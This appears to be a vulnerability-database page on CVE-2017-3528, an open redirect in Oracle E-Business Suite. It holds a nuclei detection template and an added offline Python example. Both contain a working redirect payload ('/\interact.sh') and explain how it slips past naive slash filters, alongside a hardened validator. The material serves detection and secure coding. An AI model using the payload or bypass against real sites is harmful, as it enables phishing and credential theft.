| Title | Published | Views | Family |
|---|---|---|---|
| Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect Vulnerability | 15 Jan 2018 00:00 | – | zdt |
| CVE-2017-3528 | 15 Jan 2018 00:00 | – | circl |
| Oracle Applications Framework Remote Vulnerability | 27 Apr 2017 00:00 | – | cnvd |
| CVE-2017-3528 | 24 Apr 2017 19:00 | – | cve |
| CVE-2017-3528 | 24 Apr 2017 19:00 | – | cvelist |
| Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect | 15 Jan 2018 00:00 | – | exploitdb |
| Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect | 15 Jan 2018 00:00 | – | exploitpack |
| CVE-2017-3528 | 24 Apr 2017 19:59 | – | nvd |
| Oracle Critical Patch Update Advisory - April 2017 | 18 Apr 2017 00:00 | – | oracle |
| Oracle E-Business Multiple Vulnerabilities (April 2017 CPU) | 19 Apr 2017 00:00 | – | nessus |
```yaml
id: CVE-2017-3528

info:
  name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: 'The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.'
  impact: |
    Attackers can redirect users to malicious sites for phishing attacks, malware distribution, or credential theft.
  remediation: |
    Apply the necessary patches or updates provided by Oracle to fix the open redirect vulnerability.
  reference:
    - https://blog.zsec.uk/cve-2017-3528/
    - https://www.exploit-db.com/exploits/43592
    - https://nvd.nist.gov/vuln/detail/CVE-2017-3528
    - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html
    - http://www.securitytracker.com/id/1038299
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2017-3528
    cwe-id: CWE-601
    epss-score: 0.14558
    epss-percentile: 0.96203
    cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: oracle
    product: applications_framework
  tags: cve,cve2017,oracle,redirect,edb,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"

    matchers:
      - type: word
        part: body
        words:
          - 'noresize src="/\interact.sh?configName='
# digest: 4a0a00473045022100d4f87529a818f5c8e3c326df3692d379bb7aa0228c2818d1e84ff85ef016a7d10220799bc6b962787269b2a533adf6c650ebef763562d191a25ff2cfce0be78f1b51:922c64590222798bb761d5b6d8e72950
```
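The template above sends a single GET with `redirect=%2f%5cinteract.sh` and looks for that value reflected into a frame `src`. The Python below is an added worked example, not part of the nuclei template, the Vulners page, or Oracle's code. It shows what the matcher relies on: a `/\host` value passes a filter that only demands a leading slash and forbids `//`, a browser resolves the backslash as a slash and lands on `//host`, so the frame loads from the attacker's origin. It also shows a same-origin validator that rejects the value. `https://ebs.example` and the sample frameset body are constructed stand-ins, and `interact.sh` plays the attacker-controlled listener, as in the template.

```python
"""Open-redirect check for the CVE-2017-3528 vector (added example).

Nothing here touches the network: the probe URL is built the way the template
builds it, and the matcher is applied to a response body supplied by the caller.
"""
import re
from typing import Optional
from urllib.parse import quote, urljoin, urlsplit

VULN_PATH = "/OA_HTML/cabo/jsps/a.jsp"


def build_probe_url(base_url: str, callback_host: str) -> str:
    """Request the template sends: redirect=/\\<host>, URL-encoded."""
    payload = quote("/\\" + callback_host, safe="")  # -> %2F%5Cinteract.sh
    return f"{base_url.rstrip('/')}{VULN_PATH}?_t=fredRC&configName=&redirect={payload}"


# Constructed stand-in for the frameset a.jsp returns; not a capture from a real
# E-Business Suite host. The redirect value is echoed straight into the frame src.
SAMPLE_BODY = (
    '<html><head><title>Oracle</title></head>'
    '<frameset rows="100%">'
    '<frame name="main" noresize src="/\\interact.sh?configName=">'
    '</frameset></html>'
)

FRAME_SRC = re.compile(r'noresize src="([^"]*)"')


def extract_frame_src(body: str) -> Optional[str]:
    """Pull the frame src the template's word matcher keys on."""
    m = FRAME_SRC.search(body)
    return m.group(1) if m else None


def browser_resolve(base: str, ref: str) -> str:
    """Resolve ref against base as a WHATWG-conformant browser does for http(s):
    a backslash in a special-scheme URL is treated as a forward slash, so
    '/\\host' becomes the scheme-relative '//host'. urljoin alone would not."""
    return urljoin(base, ref.replace("\\", "/"))


def leaves_origin(base: str, ref: str) -> bool:
    """True when the browser would end up on a different host than base."""
    return urlsplit(browser_resolve(base, ref)).netloc != urlsplit(base).netloc


def naive_is_local(ref: str) -> bool:
    """The kind of allow-list this payload gets past: one leading slash, no '//'."""
    return ref.startswith("/") and not ref.startswith("//")


def safe_is_local(ref: str) -> bool:
    """Hardened: normalise backslashes first, then require a path-only reference
    with no scheme and no authority."""
    ref = ref.replace("\\", "/")
    parts = urlsplit(ref)
    return (parts.scheme == "" and parts.netloc == ""
            and ref.startswith("/") and not ref.startswith("//"))


def is_vulnerable(body: str, callback_host: str,
                  base_url: str = "https://ebs.example") -> bool:
    """Template matcher (payload reflected into the frame src) plus the
    browser-side consequence (the frame would load from callback_host)."""
    src = extract_frame_src(body)
    if src is None or not src.startswith("/\\" + callback_host):
        return False
    return leaves_origin(base_url + VULN_PATH, src)


if __name__ == "__main__":
    print(build_probe_url("https://ebs.example", "interact.sh"))
    print("naive filter accepts payload:", naive_is_local("/\\interact.sh?configName="))
    print("hardened filter accepts payload:", safe_is_local("/\\interact.sh?configName="))
    print("sample body vulnerable:", is_vulnerable(SAMPLE_BODY, "interact.sh"))
```

`build_probe_url` yields the same request line as the template (upper-case percent-encoding, which servers treat identically), and `is_vulnerable` is the template's word matcher with the origin check added; feed it the body from a real response to reproduce the template's verdict offline. The point to take from `naive_is_local` versus `safe_is_local` is that backslash normalisation has to happen before any prefix check, because the browser performs it after the server's check has already passed.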